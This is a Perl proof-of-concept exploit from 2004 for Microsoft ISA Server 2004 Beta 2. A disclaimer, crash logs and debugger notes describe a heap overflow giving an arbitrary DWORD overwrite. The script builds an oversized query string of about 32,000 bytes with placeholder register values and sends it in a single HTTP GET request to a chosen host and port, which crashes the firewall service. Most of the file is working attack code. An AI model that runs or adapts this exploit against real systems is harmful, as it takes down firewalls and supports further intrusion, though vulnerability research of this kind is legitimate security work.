#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
#  ************************************************** !!! WARNING !!! ***********************************************************
#  *                                            FOR SECURITY TESTiNG ONLY!                                                      *
#  ******************************************************************************************************************************
#  * By using this code you agree that I makes no warranties or representations, express or implied, about the                  *
#  * accuracy, timeliness or completeness of this, including without limitations the implied warranties of                      *
#  * merchantability and fitness for a particular purpose.                                                                      *
#  * I makes NO Warranty of non-infringement. This code may contain technical inaccuracies or typographical errors.             *
#  * This code can never be copyrighted or owned by any commercial company, under no circumstances what so ever.                *
#  * but can be use for as long the developer, are giving explicit approval of the usage, and the user understand               *
#  * and approve of all the parts written in this notice.                                                                       *
#  * This program may NOT be used by any Danish company, unless explicit written permission from the developer .                *
#  * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect                *
#  * or punitive damages arising out of access to, inability to access, or any use of the content of this code,                 *
#  * including without limitation any PC, other equipment or other property, even if I am Expressly advised of                  *
#  * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit                    *
#  * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring,          *
#  * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read          *
#  * this disclaimer. Once again this code is for penetration testing purposes only.                                            *
#  ******************************************************************************************************************************
#
# Notes:
#   The more complex our security becomes, the more complex our enemy's efforts must be. The more we seek to shut him out, 
#   the better he must learn to become at breaking in. Each new level of security that we manage becomes no more than a 
#   stepping stone for him who would surpass us, for he bases his next assault upon our best defenses.
#
# 
#       Tested on : 
#  - Windows 2000 Server SP4, latest patches
#            - ISA 2004 Beta release 2
#       
#       The following 2 errors will end up in the event viewer: 
#               ------------------------------------------------------------------------ 
#               Event Type:  Error   
#               Event Source:  Microsoft Firewall 
#               Event Category: None
#               Event ID: 14057      
#               Description: 
#                The Firewall service stopped because an application 
#                filter module C:\Program Files\Microsoft ISA Server\w3filter.dll 
#                generated an exception code C0000005 in address 10012B1C when 
#                function CompleteAsyncIO was called. To resolve this error, 
#                remove recently installed application 
#               ------------------------------------------------------------------------ 
#
#               ------------------------------------------------------------------------ 
#               Event Type: Error    
#               Event Source: Microsoft ISA Server  
#               Event Category: None
#               Event ID: 1000      
#               Description: 
#                Faulting application wspsrv.exe, 
#                version 4.0.1872.0, stamp 3fb2f88a, faulting module w3filter.dll, 
#                version 4.0.1872.0, stamp 3fb2f848, debug? 0, fault address 0x00012b1c. 
#               
#               ------------------------------------------------------------------------ 
#
# Problem Seems to be When: (Default Settings) 
#  Maximum Header length  : 32768
#  Maximum URL Length : 10240
#  Maximum query Length : 10240
#
# The gap between the 32768 and the sum of the two are 20480
# When requesting a string by the size 21000 to 32000 the Firewall DIE
# 
# Since I own both EAX and ECX I have an arbitrary DWORD overwrite. 
# I should be able to overwrite the data at any 32bit address with a 
# 32bit value of my choosing.
#
# Address  Stack  Procedure / Arguments  Called from
# 0207FCE0 78001532 ntdll.RtlAllocateHeap  msvcrt.7800152C
# 
# This is where the Debugger stops
#  MOV DWORD PTR DS:[EDX],EAX
#  Move EAX that is a DWORD to the address in ECX, and within the segment DS
#
# This is where ECX is overwritten
#
# This is where EAX is overwritten
#  LEA EAX,DWORD PTR SS:[EBP-C]
use IO::Socket; 
use Getopt::Long; 
my $host_header; 
my $target = "127.0.0.1";
my $port = "80";
my $EAX = "\x41\x41\x41\x41";
my $ECX = "\x42\x42\x42\x42"; 
my $EDX = "\x43\x43\x43\x43"; 


$buf = join ("", "\x91" x 20154, $EAX, $ECX, $EDX, "\x90" x 11832);

GetOptions( 
        "target=s"      => \$target, 
        "port=i"        => \$port, 
        "help|?"        => sub { 
                                print "\t #################################################\n"; 
                                print "\t #         ISA 2004, Beta 2 PoC Exploit          #\n"; 
                                print "\t #  ************* !!! WARNING !!! ************   #\n"; 
                                print "\t #  ** FOR PRIVATE AND EDUCATIONAL USE ONLY! *   #\n"; 
                                print "\t #  ******************************************   #\n"; 
                                print "\t #             (c)2004 by Dennis Rand            #\n";
                                print "\t #################################################\n"; 
                                print "\n\t -target\t\t eg.: 127.0.0.1\n"; 
                                print "\t -port\t\t\t eg.: 80\n\n"; 
                                print "\tUsage eg.: isa2004_beta2.pl -t 127.0.0.1 -p 80\n"; 
                                exit; 
                                } 
); 

$error .= "Error: You must specify a target host\n" if ((!$target)); 
$error .= "Error: You must specify a port number\n" if ((!$port)); 



if ($error) 
{ 
   print "Try isa2004_beta2.pl -help or -?' for more information.\n$error\n" ; 
   exit; 
} 

$host_header = join ("", 
    "Host: $target\r\n",
    "Accept: */*\r\n",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "Content-Type: text/plain\r\n",
    "Connection: Close")|| die "[*] Failed to connect to $target port $port\n";

if ($target)
{ 
   print "\n" x 90; 
   print "\n\n"; 
   $host = $target; 
   print "[-] Target system - ISA 2004 Beta release 2\n\n";
   print "[*] Target :\t\t\t $target\n"; 
   print "[*] Port :\t\t\t $port\n";
   print "[*] Total packet Size:\t\t ".length($buf)." Bytes\n"; 
   print "[*] Connecting To Target\t"; 
   attack(); 
}; 
 
sub Con 
{ 
    $| = 1;
    $connection = IO::Socket::INET->new(
     Proto => "tcp",
     PeerAddr => $target, 
     PeerPort => $port, 
     Reuse => 1,
     Timeout => 3,);
     if(!$connection){print " FAILED\n";exit;}
     else {print " DONE\n";}
}
 
sub attack 
{ 
   Con();
   $| = 1; 
   print $connection "GET /?Bye=$buf  HTTP/1.1\r\n$host_header\r\n\r\n"; 
   close $connection; 
   print "[*] Exploit sent\n";  
   exit; 
};